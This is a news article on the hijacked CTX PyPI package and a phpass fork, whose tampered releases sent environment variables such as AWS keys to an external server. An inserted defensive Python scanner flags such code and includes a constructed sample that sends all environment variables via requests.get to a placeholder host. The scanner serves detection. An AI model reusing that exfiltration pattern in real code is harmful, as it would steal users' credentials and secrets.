Security ‘researcher’ hits back at allegations of malicious CTX file downloads

They claim that all data received has been deleted

A ‘security researcher’ accused of unethical activity over the alleged hijacking of a popular open source project insists his actions were not malicious.

Last week, as previously reported by The Daily Swig, social media users alerted the Python Package Index (PyPI) to a potentially malicious or hijacked package, CTX.


On May 22, Reddit user SocketPuppets promoted the package online, saying it had received an update after being inactive for about eight years.

The CTX Python library was available on both GitHub and PyPI. However, it was not long before participants in a Reddit thread pointed out that the GitHub repository had not been updated alongside the new PyPI release.

To make matters worse, the person responsible also allegedly compromised another package, a fork of PHP’s phpass.

Indian hacker Somdev Sangwan said: “Python’s CTX library and a fork of PHP’s phpass have been compromised.”

Domain takeover

With approximately three million downloads combined, the packages had been tampered with to send environment variables – such as AWS keys – to an external URL pointing at a Heroku application.

Once alerted to the anomaly, PyPI removed the CTX package, explaining that the exfiltration code was added after the attacker purchased the expired domain behind the email address used by the original maintainer, sent himself a password reset email, and took over the account.


Users who installed the package between May 14 and May 22, 2022 may have had environment variables and related credentials compromised.
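The behaviour described above (a package that enumerates the whole environment and hands it to an HTTP client) is simple enough to look for statically before installing an unexpected release. The following scanner is an added example written for this page, not code from the article, from PyPI or from the hijacked packages; the two sample modules, the placeholder URL on example.invalid and the function names are constructed for the illustration.

```python
"""Heuristic static check for env-var exfiltration in a Python module.

Added example: flags code that reads os.environ in bulk (os.environ.items(),
dict(os.environ), iteration) AND calls a known HTTP sender. Keyed reads such
as os.environ.get("API_TOKEN") are recorded separately and do not trigger.
Limitation: only the dotted forms below are recognised; `from os import
environ`, getattr() tricks or exec'd strings are not.
"""
import ast

# Dotted call names treated as outbound HTTP senders (assumption for this example).
HTTP_SENDERS = {
    "requests.get", "requests.post", "requests.put", "requests.patch",
    "requests.request", "httpx.get", "httpx.post",
    "urllib.request.urlopen", "urlopen",
}


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _literal_url(call):
    """Hard-coded http(s) URL from the first positional arg or url=..., else None."""
    candidates = list(call.args[:1]) + [kw.value for kw in call.keywords if kw.arg == "url"]
    for node in candidates:
        if isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and node.value.startswith(("http://", "https://")):
            return node.value
    return None


class EnvExfilVisitor(ast.NodeVisitor):
    def __init__(self):
        self.bulk_env_reads = []   # line numbers where os.environ is used whole
        self.keyed_env_reads = []  # os.environ["X"] / os.environ.get("X")
        self.http_sends = []       # (line number, hard-coded URL or None)

    def visit_Subscript(self, node):
        if _dotted(node.value) == "os.environ":
            self.keyed_env_reads.append(node.lineno)
            self.visit(node.slice)   # still inspect the key expression
            return
        self.generic_visit(node)

    def visit_Attribute(self, node):
        if node.attr == "get" and _dotted(node.value) == "os.environ":
            self.keyed_env_reads.append(node.lineno)
            return                   # os.environ.get(...) is a keyed read
        if _dotted(node) == "os.environ":
            self.bulk_env_reads.append(node.lineno)
        self.generic_visit(node)

    def visit_Call(self, node):
        if _dotted(node.func) in HTTP_SENDERS:
            self.http_sends.append((node.lineno, _literal_url(node)))
        self.generic_visit(node)


def scan_source(source, filename="<string>"):
    """Parse one module and report env reads, HTTP sends and a verdict."""
    visitor = EnvExfilVisitor()
    visitor.visit(ast.parse(source, filename=filename))
    return {
        "bulk_env_reads": visitor.bulk_env_reads,
        "keyed_env_reads": visitor.keyed_env_reads,
        "http_sends": visitor.http_sends,
        "suspicious": bool(visitor.bulk_env_reads) and bool(visitor.http_sends),
    }


# Constructed sample modelled on the described behaviour; URL is a placeholder.
MALICIOUS_SAMPLE = '''
import os
import requests

class Ctx(dict):
    def __init__(self):
        super().__init__()
        self.send_request()

    def send_request(self):
        payload = {k: v for k, v in os.environ.items()}
        requests.get("https://example.invalid/hacked/", params=payload)
'''

# Constructed benign sample: one keyed read, URL supplied by the caller.
BENIGN_SAMPLE = '''
import os
import requests

def fetch(url):
    token = os.environ.get("API_TOKEN")
    return requests.get(url, headers={"Authorization": token})
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_source(src, label))
```

Run over every `.py` file in a freshly downloaded sdist or wheel before installing it. The check is a triage aid, not a gate: a determined attacker defeats it with obfuscation, and it says nothing about the package's provenance. The tell that actually exposed this case was the release on PyPI with no matching commit on GitHub, so comparing the published artifact against the source repository, and pinning dependencies by hash, remains the more reliable control.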

SocketPuppets (account since deleted) tried to defend his actions, saying the unusual activity was due to a “new corporate account.”

The individual accused of the activity, Aydin, then published a Medium blog post to share his “side of the story”.

“All of this research contains NO malicious activity,” Aydin said. “I want to show how this simple attack affects +10 million users and businesses. ALL DATA I HAVE RECEIVED IS DELETED AND NOT USED.”

“Never Disclosed Responsibly”

According to Aydin, a “scraper tool” and a bot were used to take over the packages. It cost $5 to register the expired domain.

Aydin added that he submitted a report to the bug bounty platform HackerOne on May 15, which was closed as a duplicate a day later.

His HackerOne profile does not appear to show an associated report.

Speaking to The Daily Swig, Sangwan said the vulnerability “was never responsibly disclosed” and that “it was a real attack.”

Sangwan added: “After taking over the package, the attacker posted it on Reddit… and when other users became suspicious, I discovered another package they had compromised. The attacker came out and claimed he did it for ‘research’.

“Replacing popular software with a hijacked version that steals people’s password[s] is anything but research.”
